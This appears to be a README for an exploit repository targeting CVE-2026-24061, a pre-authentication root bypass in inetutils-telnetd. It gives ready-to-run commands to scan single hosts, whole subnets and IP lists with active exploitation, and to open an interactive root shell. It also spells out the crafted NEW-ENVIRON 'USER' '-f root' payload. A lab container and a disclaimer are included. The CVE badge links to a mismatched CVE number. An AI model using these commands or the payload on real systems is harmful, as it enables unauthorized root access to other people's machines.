Share
## https://sploitus.com/exploit?id=DBBC7D3D-9D8D-59E0-ACBD-0A708083D574
# CVE-2026-24061 Vulnerability Scanner & Exploit


[![License](https://img.shields.io/badge/License-MIT-green.svg)](LICENSE)
[![CVE](https://img.shields.io/badge/CVE-2026-24061-red.svg)](https://nvd.nist.gov/vuln/detail/CVE-2025-14847)

> **๐Ÿ‘จโ€๐Ÿ’ป Author:** Furkan KAYAPINAR ([@FurkanKAYAPINAR](https://github.com/FurkanKAYAPINAR))

## Overview
This repository contains a vulnerability scanner and an interactive exploit for **CVE-2026-24061**. This vulnerability affects `inetutils-telnetd` (and potentially other Telnet implementations) through improper handling of the `NEW-ENVIRON` Telnet option, allowing for remote pre-authentication access using the `-f root` payload.

## Features
- **scanner.py**: A multi-threaded, efficient scanner supporting single targets, CIDR subnets, and IP lists. It includes an optional `--exploit` flag for verifying RCE.
- **exploit.py**: A robust, interactive Telnet client that automates the exploit chain and drops the user into a root shell upon success.
- **Lab Environment**: A Dockerized Ubuntu environment running a vulnerable version of `inetutils-telnetd` for safe testing.

## Installation
Ensure you have Python 3.x installed.
```bash
git clone https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root.git
cd CVE-2026-24061-telnet2root

## Usage
```

### 1. Vulnerability Scanner
Scan targets for the `NEW-ENVIRON` vulnerability.

```bash
# Scan a single target
python3 scanner.py -t 192.168.1.100 -p 1903

# Scan a subnet
python3 scanner.py -s 192.168.1.0/24 -p 1903

# Scan a list of IPs and attempt active exploitation (RCE check)
python3 scanner.py -l ips.txt -p 1903 --exploit
```

### 2. Interactive Exploit
Gain interactive root shell access.

```bash
python3 exploit.py -t 127.0.0.1 -p 1903
```

## Lab Environment Setup
Deploy a local vulnerable environment for testing:

1. Navigate to the lab directory:
   ```bash
   cd lab
   ```
2. Build and start the container:
   ```bash
   docker-compose up -d --build
   ```
   *The service will be listening on port **1903**.*

## Technical Details
The vulnerability is triggered during the Telnet negotiation phase. By responding to the server's `DO NEW-ENVIRON` request with a specially crafted `IS VAR "USER" VALUE "-f root"` sub-negotiation packet, the server-side `telnetd` process is tricked into passing the `-f root` flag to the `login` process, bypassing authentication.

## Disclaimer
> [!WARNING]  
> This tool is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and unethical.